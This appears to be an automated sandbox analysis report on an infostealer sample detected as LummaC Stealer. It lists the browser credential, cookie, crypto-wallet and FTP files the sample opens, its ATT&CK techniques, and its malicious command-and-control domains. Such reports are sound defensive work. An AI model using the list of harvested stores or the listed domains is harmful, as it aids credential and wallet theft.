            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 3084, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 3084, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		34
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		741
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory34
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol41
            Data from Local System            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
            Obfuscated Files or Information            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing            		LSA Secrets223
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe100%AviraTR/Crypt.TPM.Gen
            file.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            http://crl.microsoft0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
            https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            necklacedmny.store
            		188.114.97.3
            		truetrue
              		unknown
              fp2e7a.wpc.phicdn.net
              		192.229.221.95
              		truefalse
                		unknown
                presticitpo.store
                		unknown
                		unknowntrue
                  		unknown
                  thumbystriw.store
                  		unknown
                  		unknowntrue
                    		unknown
                    crisiwarny.store
                    		unknown
                    		unknowntrue
                      		unknown
                      fadehairucw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        presticitpo.storetrue
                          		unknown
                          necklacedmny.storetrue
                            		unknown
                            fadehairucw.storetrue
                              		unknown
                              founpiuer.storetrue
                                		unknown
                                crisiwarny.storetrue
                                  		unknown
                                  https://necklacedmny.store/apitrue
                                    		unknown
                                    scriptyprefej.storetrue
                                      		unknown
                                      navygenerayk.storetrue
                                        		unknown
                                        thumbystriw.storetrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://necklacedmny.store/5file.exe, 00000000.00000003.2141543367.000000000175F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
